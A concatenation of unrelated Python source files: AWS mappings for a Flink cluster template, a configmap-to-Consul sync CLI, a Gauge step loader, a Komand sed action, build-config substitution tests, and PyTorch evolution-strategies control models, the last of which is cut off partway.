"m3.large": {"Arch": "NATHVM64"},
"m3.xlarge": {"Arch": "NATHVM64"},
"m3.2xlarge": {"Arch": "NATHVM64"},
"m4.large": {"Arch": "NATHVM64"},
"m4.xlarge": {"Arch": "NATHVM64"},
"m4.2xlarge": {"Arch": "NATHVM64"},
"m4.4xlarge": {"Arch": "NATHVM64"},
"m4.10xlarge": {"Arch": "NATHVM64"},
"c1.medium": {"Arch": "NATPV64"},
"c1.xlarge": {"Arch": "NATPV64"},
"c3.large": {"Arch": "NATHVM64"},
"c3.xlarge": {"Arch": "NATHVM64"},
"c3.2xlarge": {"Arch": "NATHVM64"},
"c3.4xlarge": {"Arch": "NATHVM64"},
"c3.8xlarge": {"Arch": "NATHVM64"},
"c4.large": {"Arch": "NATHVM64"},
"c4.xlarge": {"Arch": "NATHVM64"},
"c4.2xlarge": {"Arch": "NATHVM64"},
"c4.4xlarge": {"Arch": "NATHVM64"},
"c4.8xlarge": {"Arch": "NATHVM64"},
"g2.2xlarge": {"Arch": "NATHVMG2"},
"g2.8xlarge": {"Arch": "NATHVMG2"},
"r3.large": {"Arch": "NATHVM64"},
"r3.xlarge": {"Arch": "NATHVM64"},
"r3.2xlarge": {"Arch": "NATHVM64"},
"r3.4xlarge": {"Arch": "NATHVM64"},
"r3.8xlarge": {"Arch": "NATHVM64"},
"i2.xlarge": {"Arch": "NATHVM64"},
"i2.2xlarge": {"Arch": "NATHVM64"},
"i2.4xlarge": {"Arch": "NATHVM64"},
"i2.8xlarge": {"Arch": "NATHVM64"},
"d2.xlarge": {"Arch": "NATHVM64"},
"d2.2xlarge": {"Arch": "NATHVM64"},
"d2.4xlarge": {"Arch": "NATHVM64"},
"d2.8xlarge": {"Arch": "NATHVM64"},
"hi1.4xlarge": {"Arch": "NATHVM64"},
"hs1.8xlarge": {"Arch": "NATHVM64"},
"cr1.8xlarge": {"Arch": "NATHVM64"},
"cc2.8xlarge": {"Arch": "NATHVM64"}
}
AWSRegionArch2AMI = {
"us-east-1": {"PV64": "ami-2a69aa47", "HVM64": "ami-6869aa05",
"HVMG2": "ami-2e5e9c43"},
"us-west-2": {"PV64": "ami-7f77b31f", "HVM64": "ami-7172b611",
"HVMG2": "ami-83b770e3"},
"us-west-1": {"PV64": "ami-a2490dc2", "HVM64": "ami-31490d51",
"HVMG2": "ami-fd76329d"},
"eu-west-1": {"PV64": "ami-4cdd453f", "HVM64": "ami-f9dd458a",
"HVMG2": "ami-b9bd25ca"},
"eu-central-1": {"PV64": "ami-6527cf0a", "HVM64": "ami-ea26ce85",
"HVMG2": "ami-7f04ec10"},
"ap-northeast-1": {"PV64": "ami-3e42b65f", "HVM64": "ami-374db956",
"HVMG2": "ami-e0ee1981"},
"ap-northeast-2": {"PV64": "NOT_SUPPORTED", "HVM64": "ami-2b408b45",
"HVMG2": "NOT_SUPPORTED"},
"ap-southeast-1": {"PV64": "ami-df9e4cbc", "HVM64": "ami-a59b49c6",
"HVMG2": "ami-0cb5676f"},
"ap-southeast-2": {"PV64": "ami-63351d00", "HVM64": "ami-dc361ebf",
"HVMG2": "ami-a71c34c4"},
"sa-east-1": {"PV64": "ami-1ad34676", "HVM64": "ami-6dd04501",
"HVMG2": "NOT_SUPPORTED"},
"cn-north-1": {"PV64": "ami-77559f1a", "HVM64": "ami-8e6aa0e3",
"HVMG2": "NOT_SUPPORTED"}
}
FlinkVersion2Env = {
"flink1.1.1-hadoop27-scala2.11": {
"dirname": "flink-1.1.1",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.1/" +
"flink-1.1.1-bin-hadoop27-scala_2.11.tgz"
)
},
"flink1.1.1-hadoop27-scala2.10": {
"dirname": "flink-1.1.1",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.1/" +
"flink-1.1.1-bin-hadoop27-scala_2.10.tgz"
)
},
"flink1.1.1-hadoop26-scala2.11": {
"dirname": "flink-1.1.1",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.1/" +
"flink-1.1.1-bin-hadoop26-scala_2.11.tgz"
)
},
"flink1.1.1-hadoop26-scala2.10": {
"dirname": "flink-1.1.1",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.1/" +
"flink-1.1.1-bin-hadoop26-scala_2.10.tgz"
)
},
"flink1.1.1-hadoop24-scala2.11": {
"dirname": "flink-1.1.1",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.1/" +
"flink-1.1.1-bin-hadoop24-scala_2.11.tgz"
)
},
"flink1.1.1-hadoop24-scala2.10": {
"dirname": "flink-1.1.1",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.1/" +
"flink-1.1.1-bin-hadoop24-scala_2.10.tgz"
)
},
"flink1.1.1-hadoop2-scala2.11": {
"dirname": "flink-1.1.1",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.1/" +
"flink-1.1.1-bin-hadoop2-scala_2.11.tgz"
)
},
"flink1.1.1-hadoop2-scala2.10": {
"dirname": "flink-1.1.1",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.1/" +
"flink-1.1.1-bin-hadoop2-scala_2.10.tgz"
)
},
"flink1.1.0-hadoop27-scala2.11": {
"dirname": "flink-1.1.0",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.0/" +
"flink-1.1.0-bin-hadoop27-scala_2.11.tgz"
)
},
"flink1.1.0-hadoop27-scala2.10": {
"dirname": "flink-1.1.0",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.0/" +
"flink-1.1.0-bin-hadoop27-scala_2.10.tgz"
)
},
"flink1.1.0-hadoop26-scala2.11": {
"dirname": "flink-1.1.0",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.0/" +
"flink-1.1.0-bin-hadoop26-scala_2.11.tgz"
)
},
"flink1.1.0-hadoop26-scala2.10": {
"dirname": "flink-1.1.0",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.0/" +
"flink-1.1.0-bin-hadoop26-scala_2.10.tgz"
)
},
"flink1.1.0-hadoop24-scala2.11": {
"dirname": "flink-1.1.0",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.0/" +
"flink-1.1.0-bin-hadoop24-scala_2.11.tgz"
)
},
"flink1.1.0-hadoop24-scala2.10": {
"dirname": "flink-1.1.0",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.0/" +
"flink-1.1.0-bin-hadoop24-scala_2.10.tgz"
)
},
"flink1.1.0-hadoop2-scala2.11": {
"dirname": "flink-1.1.0",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.0/" +
"flink-1.1.0-bin-hadoop2-scala_2.11.tgz"
)
},
"flink1.1.0-hadoop2-scala2.10": {
"dirname": "flink-1.1.0",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.1.0/" +
"flink-1.1.0-bin-hadoop2-scala_2.10.tgz"
)
},
"flink1.0.3-hadoop27-scala2.11": {
"dirname": "flink-1.0.3",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.0.3/" +
"flink-1.0.3-bin-hadoop27-scala_2.11.tgz"
)
},
"flink1.0.3-hadoop27-scala2.10": {
"dirname": "flink-1.0.3",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.0.3/" +
"flink-1.0.3-bin-hadoop27-scala_2.10.tgz"
)
},
"flink1.0.3-hadoop26-scala2.11": {
"dirname": "flink-1.0.3",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.0.3/" +
"flink-1.0.3-bin-hadoop26-scala_2.11.tgz"
)
},
"flink1.0.3-hadoop26-scala2.10": {
"dirname": "flink-1.0.3",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.0.3/" +
"flink-1.0.3-bin-hadoop26-scala_2.10.tgz"
)
},
"flink1.0.3-hadoop24-scala2.11": {
"dirname": "flink-1.0.3",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.0.3/" +
"flink-1.0.3-bin-hadoop24-scala_2.11.tgz"
)
},
"flink1.0.3-hadoop24-scala2.10": {
"dirname": "flink-1.0.3",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.0.3/" +
"flink-1.0.3-bin-hadoop24-scala_2.10.tgz"
)
},
"flink1.0.3-hadoop2-scala2.11": {
"dirname": "flink-1.0.3",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.0.3/" +
"flink-1.0.3-bin-hadoop2-scala_2.11.tgz"
)
},
"flink1.0.3-hadoop2-scala2.10": {
"dirname": "flink-1.0.3",
"binurl": (
"http://www-us.apache.org/dist/flink/flink-1.0.3/" +
"flink-1.0.3-bin-hadoop2-scala_2.10.tgz"
)
},
}
FlinkCidrBlock = {
"private": {"CIDR": "10.77.0.0/24"},
"public": {"CIDR": "10.77.1.0/24"},
"vpc": {"CIDR": "10.77.0.0/16"},
}
AWSNATAMI = {
"ap-northeast-1": {"AMI": "ami-c7e016c7"},
"ap-northeast-2": {"AMI": "NOT-AVAILABLE"},
"ap-south-1": {"AMI": "NOT-AVAILABLE"},
"ap-southeast-1": {"AMI": "ami-b098a9e2"},
"ap-southeast-2": {"AMI": "ami-0fed9d35"},
"eu-central-1": {"AMI": "ami-3604392b"},
"eu-west-1": {"AMI": "ami-cb7de3bc"},
"sa-east-1": {"AMI": "ami-93fb408e"},
"us-east-1": {"AMI": "ami-c02b04a8"},
"us-west-1": {"AMI": "ami-67a54423"},
"us-west-2": {"AMI": "ami-2dae821d"},
}
def add_mappings(t):
t.add_mapping("AWSInstanceType2Arch", AWSInstanceType2Arch)
t.add_mapping("AWSInstanceType2NATArch", AWSInstanceType2NATArch)
t.add_mapping("AWSNATAMI", AWSNATAMI)
t.add_mapping("AWSRegionArch2AMI", AWSRegionArch2AMI)
t.add_mapping("FlinkCidrBlock", FlinkCidrBlock)
t.add_mapping("FlinkVersion2Env", FlinkVersion2Env)
|
import schedule
import time
import click
from configmap2consul.configmap2consul import configmap_2_consul, logging, init_consul_client
log = logging.getLogger("cli")
log_format = "%(asctime)s | %(levelname)9s | %(message)s"
logging.basicConfig(format=log_format, level=logging.INFO)
CLICK_CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
@click.command(context_settings=CLICK_CONTEXT_SETTINGS)
@click.option('--namespace', '-n',
required=True,
type=str,
default="default",
help='Kubernetes Configmap Namespace')
@click.option('--interval', '-i',
required=True,
type=int,
default=5,
show_default=True,
help="Polling interval, if -1 will run once and quit")
@click.option('--labels', '-l',
required=False,
type=str,
help="Labels to filter kubernetes configmap")
@click.option('--consul_url', '-c',
required=True,
type=str,
default="http://localhost:8500",
help="Consul endpoint: e.g https://myconsul.mydomain.org:8500")
@click.option('--basepath', '-p',
required=True,
type=str,
default="test",
help="Consul path for stored K/V")
@click.option('--separator', '-s',
required=False,
default="::",
type=str,
help="token separator for profile version (spring mode only)")
@click.option("--dryrun", "-d",
is_flag=True,
help="Do not create consul data")
def main(namespace=None, interval=None, labels=None, consul_url=None, basepath=None, separator=None, dryrun=None):
consul_client = init_consul_client(consul_url)
if interval == -1:
log.info("Single run mode")
configmap_2_consul(
namespace,
labels,
consul_client,
basepath,
separator,
dryrun)
else:
log.info("Scheduled run mode")
# run first
configmap_2_consul(
namespace,
labels,
consul_client,
basepath,
separator,
dryrun)
# schedule next
schedule.every(interval).seconds.do(
configmap_2_consul,
namespace,
labels,
consul_client,
basepath,
separator,
dryrun)
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
main()
|
import importlib
import inspect
import json
import re
import shutil
import sys
import traceback
from os import path
from getgauge import logger
from getgauge.registry import registry
from getgauge.util import *
project_root = get_project_root()
impl_dirs = get_step_impl_dirs()
env_dir = os.path.join(project_root, 'env', 'default')
requirements_file = os.path.join(project_root, 'requirements.txt')
sys.path.append(project_root)
PLUGIN_JSON = 'python.json'
VERSION = 'version'
PYTHON_PROPERTIES = 'python.properties'
SKEL = 'skel'
def load_impls(step_impl_dirs=impl_dirs):
os.chdir(project_root)
for impl_dir in step_impl_dirs:
if not os.path.isdir(impl_dir):
logger.error('Cannot import step implementations. Error: {} does not exist.'.format(step_impl_dirs))
logger.error('Make sure `STEP_IMPL_DIR` env var is set to a valid directory path.')
return
base_dir = project_root if impl_dir.startswith(project_root) else os.path.dirname(impl_dir)
_import_impl(base_dir, impl_dir)
def copy_skel_files():
try:
logger.info('Initialising Gauge Python project')
logger.info('create {}'.format(env_dir))
os.makedirs(env_dir)
logger.info('create {}'.format(impl_dirs[0]))
shutil.copytree(os.path.join(SKEL,path.basename(impl_dirs[0]) ), impl_dirs[0])
logger.info('create {}'.format(os.path.join(env_dir, PYTHON_PROPERTIES)))
shutil.copy(os.path.join(SKEL, PYTHON_PROPERTIES), env_dir)
with open(requirements_file, 'w') as f:
f.write('getgauge==' + _get_version())
except:
logger.fatal('Exception occurred while copying skel files.\n{}.'.format(traceback.format_exc()))
def _import_impl(base_dir, step_impl_dir):
for f in os.listdir(step_impl_dir):
file_path = os.path.join(step_impl_dir, f)
if f.endswith('.py'):
_import_file(base_dir, file_path)
elif path.isdir(file_path):
_import_impl(base_dir, file_path)
def _import_file(base_dir, file_path):
rel_path = os.path.normpath(file_path.replace(base_dir + os.path.sep, ''))
try:
module_name = os.path.splitext(rel_path.replace(os.path.sep, '.'))[0]
m = importlib.import_module(module_name)
# Get all classes in the imported module
classes = inspect.getmembers(m, lambda member: inspect.isclass(member) and member.__module__ == module_name)
if len(classes) > 0:
for c in classes:
file = inspect.getfile(c[1])
# Create instance of step implementation class.
if _has_methods_with_gauge_decoratores(c[1]):
update_step_resgistry_with_class(c[1](), file_path) # c[1]() will create a new instance of the class
except:
logger.fatal('Exception occurred while loading step implementations from file: {}.\n'.format(rel_path, traceback.format_exc()))
# Inject instace in each class method (hook/step)
def update_step_resgistry_with_class(instance, file_path):
for info in registry.get_all_methods_in(file_path):
class_methods = [x[0] for x in inspect.getmembers(instance, inspect.ismethod)]
if info.impl.__name__ in class_methods:
info.instance = instance
def _get_version():
json_data = open(PLUGIN_JSON).read()
data = json.loads(json_data)
return data[VERSION]
def _has_methods_with_gauge_decoratores(klass):
foo = r"@(step|before_suite|after_suite|before_scenario|after_scenario|before_spec|after_spec|before_step|after_step|screenshot|custom_screen_grabber)"
sourcelines = inspect.getsourcelines(klass)[0]
for i,line in enumerate(sourcelines):
if re.match(foo, line.strip()) != None:
return True
|
import komand
from .schema import ProcessStringInput, ProcessStringOutput, Input, Output
# Custom imports below
from komand_sed.util.helper import Helper
class ProcessString(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='process_string',
description='Process string',
input=ProcessStringInput(),
output=ProcessStringOutput())
def run(self, params={}):
input_str = params.get(Input.STRING).encode()
sed_list = params.get(Input.EXPRESSION)
sed_opts = params.get(Input.OPTIONS)
return {
Output.OUTPUT: Helper.process(input_str, sed_list, sed_opts).decode("utf-8")
}
|
# coding=utf-8
#
# pylint: disable = missing-docstring
"""
Copyright (c) 2021, Alexander Magola. All rights reserved.
license: BSD 3-Clause License, see LICENSE for more details.
"""
import pytest
from zm.buildconf.processing import ConfManager
CONF_HEADER_YML = """
fragment1: |
program
end program
fragment2: |
program
$MYFLAGS
end program
GCC_BASE_CXXFLAGS: -std=c++11 -fPIC
MYFLAGS: -O2 -g
MYFLAGS1: $MYFLAGS -Wall -Wextra
MYFLAGS2: -Wall $MYFLAGS -Wextra
MYFLAGS3: -Wall -Wextra $MYFLAGS
MYFLAGS4: ${MYFLAGS} -Wall -Wextra
MYFLAGS5: -Wall ${MYFLAGS} -Wextra
MYFLAGS6: -Wall -Wextra ${MYFLAGS}
AFLAGS1: $$GCC_BASE_CXXFLAGS -Wall ${MYFLAGS} -Wextra
AFLAGS2: "$GCC_BASE_CXXFLAGS -Wall $${MYFLAGS} -Wextra"
AFLAGS3: '$GCC_BASE_CXXFLAGS -Wall ${MYFLAGS} -Wextra'
"""
CONF_BODY_YML = """
buildtypes:
debug1: { cxxflags: $MYFLAGS1 -O0 }
debug2:
cxxflags: ${MYFLAGS2} -O0
debug3: { cxxflags: $$MYFLAGS3 -O0 }
debug3:
cxxflags: ${MYFLAGS3} -O0
debug4: { cxxflags: "$MYFLAGS4 -O0" }
debug5: { cxxflags: "${MYFLAGS5} -O0" }
debug6: { cxxflags: '${MYFLAGS6} -O0' }
release1 : { cxxflags: $AFLAGS1 -O2 }
release2 : { cxxflags: $AFLAGS2 -O2 }
release3 : { cxxflags: $AFLAGS3 -O2 }
tasks:
util :
features : cxxshlib
source : 'shlib/**/*.cpp'
configure:
- do: check-code
text: $fragment1
label: fragment1
- do: check-code
text: $fragment2
label: fragment2
prog :
features : cxxprogram
source : 'prog/**/*.cpp'
use : util
"""
ROOT_CONF_YML = CONF_HEADER_YML + CONF_BODY_YML
SUBDIR_LVL1 = 'lib'
SUBDIR_LVL2 = 'core'
ROOT_SUBDIRS_YAML = """
%s
subdirs: [ %s ]
""" % (CONF_HEADER_YML, SUBDIR_LVL1)
MIDDLE_SUBDIRS_YML = """
subdirs: [ %s ]
""" % SUBDIR_LVL2
LAST_SUBDIRS_YAML = CONF_BODY_YML
def checkVars(bconf, dbgValidVals, relValidVals):
buildtypes = bconf.getattr('buildtypes')[0]
def getFlags(buildtypes, buildtype):
cxxflags = buildtypes[buildtype]['cxxflags']
try:
cxxflags = cxxflags.val
except AttributeError:
pass
return cxxflags
for idx in range(1, 7):
buildtype = 'debug%d' % idx
valid = dbgValidVals[idx-1]
valid2 = valid.split()
assert getFlags(buildtypes, buildtype) in (valid, valid2)
for idx in range(1, 4):
buildtype = 'release%d' % idx
valid = relValidVals[idx-1]
valid2 = valid.split()
assert getFlags(buildtypes, buildtype) in (valid, valid2)
def checkConfigNoEnv(bconf):
dbgValidVals = [
"-O2 -g -Wall -Wextra -O0",
"-Wall -O2 -g -Wextra -O0",
"-Wall -Wextra -O2 -g -O0",
"-O2 -g -Wall -Wextra -O0",
"-Wall -O2 -g -Wextra -O0",
"-Wall -Wextra -O2 -g -O0",
]
relValidVals = [
"-std=c++11 -fPIC -Wall -O2 -g -Wextra -O2",
"-std=c++11 -fPIC -Wall -O2 -g -Wextra -O2",
"-std=c++11 -fPIC -Wall -O2 -g -Wextra -O2",
]
checkVars(bconf, dbgValidVals, relValidVals)
assert bconf.tasks['util']['configure'][0]['text'] == "program\nend program\n"
assert bconf.tasks['util']['configure'][1]['text'] == "program\n-O2 -g\nend program\n"
def checkConfigWithEnv(bconf):
dbgValidVals = [
"-O3 -Wall -Wall -Wextra -O0",
"-Wall -O3 -Wall -Wextra -O0",
"-O1 -Wall -Wextra -O0",
"-O3 -Wall -Wall -Wextra -O0",
"-Wall -O3 -Wall -Wextra -O0",
"-Wall -Wextra -O3 -Wall -O0",
]
relValidVals = [
"-std=c++11 -fPIC -Wall -O3 -Wall -Wextra -O2",
"-std=c++11 -fPIC -Wall -O2 -g -Wextra -O2",
"-std=c++11 -fPIC -Wall -O3 -Wall -Wextra -O2",
]
checkVars(bconf, dbgValidVals, relValidVals)
@pytest.mark.usefixtures("unsetEnviron")
def testBasic(tmpdir, monkeypatch):
clivars = { 'buildtype': 'debug1' }
clihandler = None
rootDir = tmpdir.mkdir("test")
confFile = rootDir.join("buildconf.yml")
confFile.write(ROOT_CONF_YML)
rootDir = str(rootDir.realpath())
bconfManager = ConfManager(rootDir, clivars = clivars, clihandler = clihandler)
bconf = bconfManager.root
checkConfigNoEnv(bconf)
##########################
# with env
monkeypatch.setenv('MYFLAGS', '-O3 -Wall')
monkeypatch.setenv('MYFLAGS3', '-O1 -Wall -Wextra')
bconfManager = ConfManager(rootDir, clivars = clivars, clihandler = clihandler)
bconf = bconfManager.root
checkConfigWithEnv(bconf)
@pytest.mark.usefixtures("unsetEnviron")
def testSubdirs(tmpdir, monkeypatch):
clivars = { 'buildtype': 'debug1' }
clihandler = None
rootDir = tmpdir.mkdir("test")
confFile1 = rootDir.join("buildconf.yml")
confFile1.write(ROOT_SUBDIRS_YAML)
lvl1Dir = rootDir.mkdir(SUBDIR_LVL1)
confFile2 = lvl1Dir.join("buildconf.yml")
confFile2.write(MIDDLE_SUBDIRS_YML)
lvl2Dir = lvl1Dir.mkdir(SUBDIR_LVL2)
confFile3 = lvl2Dir.join("buildconf.yml")
confFile3.write(LAST_SUBDIRS_YAML)
rootDir = str(rootDir.realpath())
bconfManager = ConfManager(rootDir, clivars = clivars, clihandler = clihandler)
bconf = bconfManager.configs[-1]
checkConfigNoEnv(bconf)
##########################
# with env
monkeypatch.setenv('MYFLAGS', '-O3 -Wall')
monkeypatch.setenv('MYFLAGS3', '-O1 -Wall -Wextra')
bconfManager = ConfManager(rootDir, clivars = clivars, clihandler = clihandler)
bconf = bconfManager.configs[-1]
checkConfigWithEnv(bconf)
|
from functools import partial
from itertools import chain, islice, tee
import gym
import IPython
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.nn.modules.module import _addindent
from context import utils
from utils.torchutils import summarize_model, calculate_xavier_gain
def model_weight_initializer(model):
def current_and_next(some_iterable):
items, nexts = tee(some_iterable)
nexts = chain(islice(nexts, 1, None), [None])
return zip(items, nexts)
def previous_and_next(some_iterable):
prevs, items, nexts = tee(some_iterable, 3)
prevs = chain([None], prevs)
nexts = chain(islice(nexts, 1, None), [None])
return zip(prevs, items, nexts)
for module, next_module in current_and_next(model.modules()):
IPython.embed()
try:
gain = nn.init.calculate_gain(next_module)
except:
continue
if isinstance(module, nn.Conv2d):
n = module.kernel_size[0] * module.kernel_size[1] * module.out_channels
module.weight.data.normal_(0, np.sqrt(2. / n))
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.BatchNorm2d):
module.weight.data.fill_(1)
module.bias.data.zero_()
elif isinstance(module, nn.Linear):
module.weight.data.normal_(0, 0.01)
module.bias.data.zero_()
def capsule_softmax(input, dim=1):
transposed_input = input.transpose(dim, len(input.size()) - 1)
softmaxed_output = F.softmax(transposed_input.contiguous().view(-1, transposed_input.size(-1)))
return softmaxed_output.view(*transposed_input.size()).transpose(dim, len(input.size()) - 1)
class IdentityFunction(nn.Module):
"""Identity activation function module for use when no activation is needed but a function call is.
"""
def __init__(self):
super(IdentityFunction, self).__init__()
def forward(self, x):
return x
class AbstractESModel(nn.Module):
"""Abstract models class for models that are trained by evolutionary methods.
It has methods for counting parameters, layers and tensors.
"""
def parameter_norm(self):
parameter_norm = 0
for p in self.parameters():
parameter_norm += (p.data.view(-1) @ p.data.view(-1))
parameter_norm = np.sqrt(parameter_norm)
return parameter_norm
def gradient_norm(self):
gradient_norm = 0
for p in self.parameters():
if p.grad is None:
gradient_norm = None
break
gradient_norm += (p.grad.data.view(-1) @ p.grad.data.view(-1))
gradient_norm = np.sqrt(gradient_norm)
return gradient_norm
@property
def summary(self):
if not hasattr(self, '_summary'):
self._summary = summarize_model(self, self.in_dim)
return self._summary
def count_parameters(self, only_trainable=True):
"""Return the number of [trainable] parameters in this model.
"""
return self._count_parameters(self, only_trainable=only_trainable)
@staticmethod
def _count_parameters(m, only_trainable=True):
"""Count the number of [trainable] parameters in a pytorch model.
"""
k = 'n_trainable' if only_trainable else 'n_parameters'
return int(m.summary[k].sum())
def count_tensors(self, only_trainable=True):
return self._count_tensors(self, only_trainable=only_trainable)
@staticmethod
def _count_tensors(m, only_trainable=True):
"""Count the number of [trainable] tensor objects in a pytorch model.
"""
k = 'n_trainable' if only_trainable else 'n_parameters'
return sum([1 for i, l in m.summary.iterrows() for w in l['weight_shapes'] if l['weight_shapes'] and l[k] > 0])
def count_layers(self, only_trainable=True):
"""Count the number of [trainable] layers in a pytorch model.
A layer is defined as a module with a nonzero number of [trainable] parameters.
"""
return self._count_layers(self, only_trainable=only_trainable)
@staticmethod
def _count_layers(m, only_trainable=True):
k = 'n_trainable' if only_trainable else 'n_parameters'
return m.summary[m.summary[k] > 0].shape[0]
def _initialize_weights(self):
# Loop in reverse to pick up the nonlinearity following the layer for gain computation
modules = list(self.modules())
for m in reversed(modules):
try:
gain = calculate_xavier_gain(m.__class__)
except:
gain = 1
if isinstance(m, nn.Conv1d) or isinstance(m, nn.Conv2d) or isinstance(m, nn.Conv3d):
assert gain == calculate_xavier_gain(nn.Conv1d)
nn.init.xavier_normal(m.weight.data, gain=gain)
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
assert gain == calculate_xavier_gain(nn.Linear)
nn.init.xavier_normal(m.weight.data, gain=gain)
elif isinstance(m, nn.BatchNorm1d) or isinstance(m, nn.BatchNorm2d) or isinstance(m, nn.BatchNorm3d):
if m.affine:
# Affine transform does nothing at first
m.weight.data.fill_(1)
m.bias.data.zero_()
# if m.track_running_stats:
# Running stats are initialized to have no history
m.running_mean.zero_()
m.running_var.fill_(1)
def transform_range(in_value, in_maxs, in_mins, out_maxs, out_mins):
"""Transform a number from a range into another range, maintaining ratios.
"""
assert (in_value <= in_maxs).all() and (in_value >= in_mins).all()
in_range = (in_maxs - in_mins)
out_range = (out_maxs - out_mins)
return (((in_value - in_mins) * out_range) / in_range) + out_mins
def apply_sigmoid_and_transform(x, **kwargs):
"""Applies the element wise sigmoid function and transforms output into a given range
"""
view_dim = kwargs.pop('view_dim')
a = nn.Sigmoid()
y = a(x)
# y.data = torch.from_numpy(transform_range(y.data.numpy(), **kwargs))
y = y.view(view_dim)
return y
class ClassicalControlFNN(AbstractESModel):
"""
FNN for classical control problems
"""
def __init__(self, observation_space, action_space):
super(ClassicalControlFNN, self).__init__()
if type(action_space) is gym.spaces.Box:
# Continuous action space:
# Physical output to be used directly.
self.out_dim = action_space.shape
self.n_out = int(np.prod(action_space.shape))
out_mins = action_space.low if not np.isinf(action_space.low).any() else - np.ones(action_space.shape)
out_maxs = action_space.high if not np.isinf(action_space.high).any() else np.ones(action_space.shape)
sigmoid_mins = - np.ones(out_mins.shape)
sigmoid_maxs = np.ones(out_maxs.shape)
trsf_in = {'view_dim': (-1, *self.out_dim), 'in_maxs': sigmoid_maxs, 'in_mins': sigmoid_mins, 'out_maxs': out_maxs, 'out_mins': out_mins}
self.out_activation = partial(apply_sigmoid_and_transform, **trsf_in)
elif type(action_space) is gym.spaces.Discrete:
# Discrete action space:
# Probabilistic output to be indexed by maximum probability.
# Output is the index of the most likely action.
self.n_out = action_space.n
self.out_activation = nn.LogSoftmax(dim=1)
elif type(action_space) is gym.spaces.MultiDiscrete:
IPython.embed()
pass
elif type(action_space) is gym.spaces.MultiBinary:
IPython.embed()
pass
elif type(action_space) is gym.spaces.tuple:
# Tuple of different action spaces
# https://github.com/openai/gym/blob/master/gym/envs/algorithmic/algorithmic_env.py
IPython.embed()
pass
assert hasattr(observation_space, 'shape') and len(observation_space.shape) == 1
assert hasattr(action_space, 'shape')
self.in_dim = observation_space.shape
self.n_in = int(np.prod(observation_space.shape))
self.lin1 = nn.Linear(self.n_in, 32)
self.relu1 = nn.ReLU()
self.lin2 = nn.Linear(32, 64)
self.relu2 = nn.ReLU()
self.lin3 = nn.Linear(64, 128)
self.relu3 = nn.ReLU()
self.lin4 = nn.Linear(128, 128)
self.relu4 = nn.ReLU()
self.lin5 = nn.Linear(128, 64)
self.relu5 = nn.ReLU()
self.lin6 = nn.Linear(64, 32)
self.relu6 = nn.ReLU()
self.lin7 = nn.Linear(32, self.n_out)
self._initialize_weights()
def forward(self, x):
x = self.relu1(self.lin1(x))
x = self.relu2(self.lin2(x))
x = self.relu3(self.lin3(x))
x = self.relu4(self.lin4(x))
x = self.relu5(self.lin5(x))
x = self.relu6(self.lin6(x))
x = self.out_activation(self.lin7(x))
return x
class ClassicalControlRNN(AbstractESModel):
"""
RNN for classical control problems
"""
def __init__(self, observation_space, action_space):
super(ClassicalControlRNN, self).__init__()
if type(action_space) is gym.spaces.Box:
# Continuous action space:
# Physical output to be used directly.
self.out_dim = action_space.shape
self.n_out = int(np.prod(action_space.shape))
out_mins = action_space.low if not np.isinf(action_space.low).any() else - np.ones(action_space.shape)
out_maxs = action_space.high if not np.isinf(action_space.high).any() else np.ones(action_space.shape)
sigmoid_mins = - np.ones(out_mins.shape)
sigmoid_maxs = np.ones(out_maxs.shape)
trsf_in = {'view_dim': (-1, *self.out_dim), 'in_maxs': sigmoid_maxs, 'in_mins': sigmoid_mins, 'out_maxs': out_maxs, 'out_mins': out_mins}
self.out_activation = partial(apply_sigmoid_and_transform, **trsf_in)
elif type(action_space) is gym.spaces.Discrete:
# Discrete action space:
# Probabilistic output to be indexed by maximum probability.
# Output is the index of the most likely action.
self.n_out = action_space.n
self.out_activation = nn.LogSoftmax(dim=1)
assert hasattr(observation_space, 'shape') and len(observation_space.shape) == 1
assert hasattr(action_space, 'shape')
self.n_in = int(np.prod(observation_space.shape))
self.lin1 = nn.Linear(self.n_in, 32)
self.relu1 = nn.ReLU()
self.lin2 = nn.Linear(32, 64)
self.relu2 = nn.ReLU()
self.lin3 = nn.Linear(64, 64)
self.relu3 = nn.ReLU()
self.lin4 = nn.Linear(64, 32)
self.relu4 = nn.ReLU()
self.lin5 = nn.Linear(32, self.n_out)
self._initialize_weights()
def forward(self, x):
x = self.relu1(self.lin1(x))
x = self.relu2(self.lin2(x))
x = self.relu3(self.lin3(x))
x = self.relu4(self.lin4(x))
x = self.out_activation(self.lin5(x))
return x
class MujocoFNN(AbstractESModel):
"""
FNN for Mujoco control problems
"""
def __init__(self, observation_space, action_space):
super(MujocoFNN, self).__init__()
if type(action_space) is gym.spaces.Box:
# Continuous action space:
# Physical output to be used directly.
self.out_dim = action_space.shape
self.n_out = int(np.prod(action_space.shape))
out_mins = action_space.low if not np.isinf(action_space.low).any() else - np.ones(action_space.shape)
out_maxs = action_space.high if not np.isinf(action_space.high).any() else np.ones(action_space.shape)
